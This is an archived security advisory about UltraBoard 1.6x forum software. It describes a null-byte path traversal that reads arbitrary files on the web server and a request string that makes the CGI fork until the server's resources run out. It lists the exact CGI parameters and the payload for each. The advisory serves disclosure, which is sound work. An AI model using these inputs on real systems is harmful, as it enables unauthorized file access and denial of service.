Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: uboard1.htm

UltraBoard 1.6x - open any file bug



Vulnerability

    UltraBoard

Affected

    UltraBoard V1.6X

Description

    Rudi Carell found following.  He found some interesting things  in
    the "old" UltraBoard-Forum scripts  (UltraBoard V 1.6).   By using
    the good  old NullByte(\000)  its possible  to open  "any" file on
    the  webserver(with  its  permissions)  running  the  "UltraBoard"
    forum-software.  cgi-script:

        UltraBoard.pl || UltraBoard.cgi

    Variables:

        Action=PrintableTopic
        Post=[path_including_".."_to_any_file][***NULLBYTE***]
        Board=[valid_board]
        Idle=10
        Sort=0
        Order=Descend
        Page=0
        Session=

    hmm ... EOF

    Juan  M.  Bello  Rivas  added  following.   There's  even more fun
    availiable with  old versions  of ultraboard  (and latest  beta of
    ultraboard 2000 is also vulnerable  to this?).  You can  bring the
    web server to its knees by issuing a request to the CGI like this:

        QUERY_STRING=Session=../UltraBoard.pl%00%7c

    It will start forking instances of  the CGI until it eats all  the
    resources of the machine.

Solution

    Newer version fixes this?


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH